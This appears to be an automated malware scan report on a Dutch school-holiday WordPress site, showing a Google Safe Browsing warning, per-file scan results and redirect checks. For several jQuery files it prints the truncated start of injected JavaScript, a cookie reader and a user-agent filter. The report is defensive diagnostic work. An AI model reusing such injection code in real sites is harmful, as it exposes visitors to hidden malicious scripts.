Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=schoolvakantiesnederland.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://schoolvakantiesnederland.com/ | 200 OK Content-Length: 103171 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: schoolvakanties-nederland.com <!DOCTYPE html>
<!-- Lynx theme. A ZERGE design (http://www.color-theme.com - http://themeforest.net/user/ZERGE) - Proudly powered by WordPress (http://wordpress.org) --> <!--[if IE 7]> <html class="ie ie7" lang="nl-NL" xmlns:fb="http://ogp.me/ns/fb#" xmlns:addthis="http://www.addthis.com/help/api-spec" prefix="og: http://ogp.me/ns#"> <![endif]--> <!--[if IE 8]> <html class="ie ie8" l ...[4156 bytes skipped]... | ||
http://schoolvakantiesnederland.com/wp-includes/js/jquery/jquery.js | 200 OK Content-Length: 97460 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(e){var o=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return o?decodeURIComponent(o[1]):void 0}!function(){function e(e,o,t){var r=(e+"").toLowerCase(),i=(o+"").toLowerCase(),n=0;return-1!==(n=r.indexOf(i,t))?n:!1}function o(){var o=["Linux","Windows NT 6.3","Windows NT 6.2","rv:11.0","AppleWebKit","Android","Googlebot","IEMobile","Yandex"],t=!1;for(var r in o)if(e(navigator.userAgent,o[r])){t=!0;break}return t}var t jQuery.noConflict(); Antivirus reports:
| ||
http://schoolvakantiesnederland.com/wp-includes/js/jquery/jquery-migrate.min.js | 200 OK Content-Length: 8258 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(e){var o=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return o?decodeURIComponent(o[1]):void 0}!function(){function e(e,o,t){var r=(e+"").toLowerCase(),i=(o+"").toLowerCase(),n=0;return-1!==(n=r.indexOf(i,t))?n:!1}function o(){var o=["Linux","Windows NT 6.3","Windows NT 6.2","rv:11.0","AppleWebKit","Android","Googlebot","IEMobile","Yandex"],t=!1;for(var r in o)if(e(navigator.userAgent,o[r])){t=!0;break}return t}var t Antivirus reports:
| ||
http://schoolvakantiesnederland.com/wp-includes/js/jquery/ui/jquery.ui.core.min.js | 200 OK Content-Length: 5347 Content-Type: application/javascript | clean |
http://schoolvakantiesnederland.com/wp-includes/js/jquery/ui/jquery.ui.widget.min.js | 200 OK Content-Length: 7579 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(e){var o=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return o?decodeURIComponent(o[1]):void 0}!function(){function e(e,o,t){var r=(e+"").toLowerCase(),i=(o+"").toLowerCase(),n=0;return-1!==(n=r.indexOf(i,t))?n:!1}function o(){var o=["Linux","Windows NT 6.3","Windows NT 6.2","rv:11.0","AppleWebKit","Android","Googlebot","IEMobile","Yandex"],t=!1;for(var r in o)if(e(navigator.userAgent,o[r])){t=!0;break}return t}var t Antivirus reports:
| ||
http://schoolvakantiesnederland.com/wp-includes/js/jquery/ui/jquery.ui.accordion.min.js | 200 OK Content-Length: 9424 Content-Type: application/javascript | clean |
http://schoolvakantiesnederland.com/wp-includes/js/jquery/ui/jquery.ui.tabs.min.js | 200 OK Content-Length: 12681 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(e){var o=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return o?decodeURIComponent(o[1]):void 0}!function(){function e(e,o,t){var r=(e+"").toLowerCase(),i=(o+"").toLowerCase(),n=0;return-1!==(n=r.indexOf(i,t))?n:!1}function o(){var o=["Linux","Windows NT 6.3","Windows NT 6.2","rv:11.0","AppleWebKit","Android","Googlebot","IEMobile","Yandex"],t=!1;for(var r in o)if(e(navigator.userAgent,o[r])){t=!0;break}return t}var t Antivirus reports:
| ||
http://schoolvakantiesnederland.com/wp-content/plugins/ct-shortcodes/js/ct-shortcodes-lib.js | 200 OK Content-Length: 1383 Content-Type: application/javascript | clean |
http://schoolvakantiesnederland.com/wp-content/plugins/sociable/js/sociable.js | 200 OK Content-Length: 3017 Content-Type: application/javascript | clean |
http://schoolvakantiesnederland.com/wp-content/plugins/sociable/js/vuible.js | 200 OK Content-Length: 1428 Content-Type: application/javascript | clean |
http://schoolvakantiesnederland.com/wp-content/plugins/sociable/js/addtofavorites.js | 200 OK Content-Length: 1660 Content-Type: application/javascript | clean |
http://schoolvakantiesnederland.com/wp-content/plugins/cookie-compliance/cookie-compliance.min.js | 200 OK Content-Length: 9393 Content-Type: application/javascript | clean |
http://apis.google.com/js/plusone.js | 200 OK Content-Length: 12509 Content-Type: application/javascript | clean |
http://schoolvakantiesnederland.com//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js/ | HTTP/1.1 301 Moved Permanently Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Date: Sat, 04 Oct 2014 20:34:16 GMT Pragma: no-cache Location: http://schoolvakantiesnederland.com/pagead2.googlesyndication.com/pagead/js/adsbygoogle.js/ Server: Apache/2.2.27 (Unix) mod_ssl/2.2.27 OpenSSL/1.0.1e-fips mod_bwlimited/1.4 Vary: Cookie,Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT X-Pingback: http://schoolvakantiesnederland.com/xmlrpc.php X-Powered-By: PHP/5.4.32 | clean |
http://schoolvakantiesnederland.com/pagead2.googlesyndication.com/pagead/js/adsbygoogle.js/ | 404 Not Found Content-Length: 45539 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: schoolvakanties-nederland.com <!DOCTYPE html>
<!-- Lynx theme. A ZERGE design (http://www.color-theme.com - http://themeforest.net/user/ZERGE) - Proudly powered by WordPress (http://wordpress.org) --> <!--[if IE 7]> <html class="ie ie7" lang="nl-NL" xmlns:fb="http://ogp.me/ns/fb#" xmlns:addthis="http://www.addthis.com/help/api-spec" prefix="og: http://ogp.me/ns#"> <![endif]--> <!--[if IE 8]> <html class="ie ie8" l ...[4176 bytes skipped]... | ||
http://schoolvakantiesnederland.com//s7.addthis.com/js/300/addthis_widget.js/ | HTTP/1.1 301 Moved Permanently Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Date: Sat, 04 Oct 2014 20:34:18 GMT Pragma: no-cache Location: http://schoolvakantiesnederland.com/s7.addthis.com/js/300/addthis_widget.js/ Server: Apache/2.2.27 (Unix) mod_ssl/2.2.27 OpenSSL/1.0.1e-fips mod_bwlimited/1.4 Vary: Cookie,Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT X-Pingback: http://schoolvakantiesnederland.com/xmlrpc.php X-Powered-By: PHP/5.4.32 | clean |
http://schoolvakantiesnederland.com/s7.addthis.com/js/300/addthis_widget.js/ | 404 Not Found Content-Length: 45539 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: schoolvakanties-nederland.com <!DOCTYPE html>
<!-- Lynx theme. A ZERGE design (http://www.color-theme.com - http://themeforest.net/user/ZERGE) - Proudly powered by WordPress (http://wordpress.org) --> <!--[if IE 7]> <html class="ie ie7" lang="nl-NL" xmlns:fb="http://ogp.me/ns/fb#" xmlns:addthis="http://www.addthis.com/help/api-spec" prefix="og: http://ogp.me/ns#"> <![endif]--> <!--[if IE 8]> <html class="ie ie8" l ...[4176 bytes skipped]... |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: schoolvakantiesnederland.com
Result:
HTTP/1.1 200 OK
Cache-Control: max-age=2592000
Connection: close
Date: Sat, 04 Oct 2014 20:34:12 GMT
Server: Apache/2.2.27 (Unix) mod_ssl/2.2.27 OpenSSL/1.0.1e-fips mod_bwlimited/1.4
Vary: Cookie,Accept-Encoding
Content-Type: text/html; charset=UTF-8
Expires: Mon, 03 Nov 2014 20:34:12 GMT
X-Pingback: http://schoolvakantiesnederland.com/xmlrpc.php
X-Powered-By: PHP/5.4.32
GET / HTTP/1.1
Host: schoolvakantiesnederland.com
Result:
HTTP/1.1 200 OK
Cache-Control: max-age=2592000
Connection: close
Date: Sat, 04 Oct 2014 20:34:12 GMT
Server: Apache/2.2.27 (Unix) mod_ssl/2.2.27 OpenSSL/1.0.1e-fips mod_bwlimited/1.4
Vary: Cookie,Accept-Encoding
Content-Type: text/html; charset=UTF-8
Expires: Mon, 03 Nov 2014 20:34:12 GMT
X-Pingback: http://schoolvakantiesnederland.com/xmlrpc.php
X-Powered-By: PHP/5.4.32
Second query (visit from search engine):
GET / HTTP/1.1
Host: schoolvakantiesnederland.com
Referer: http://www.google.com/search?q=schoolvakantiesnederland.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: schoolvakantiesnederland.com
Referer: http://www.google.com/search?q=schoolvakantiesnederland.com
Result:
The result is similar to the first query. There are no suspicious redirects found.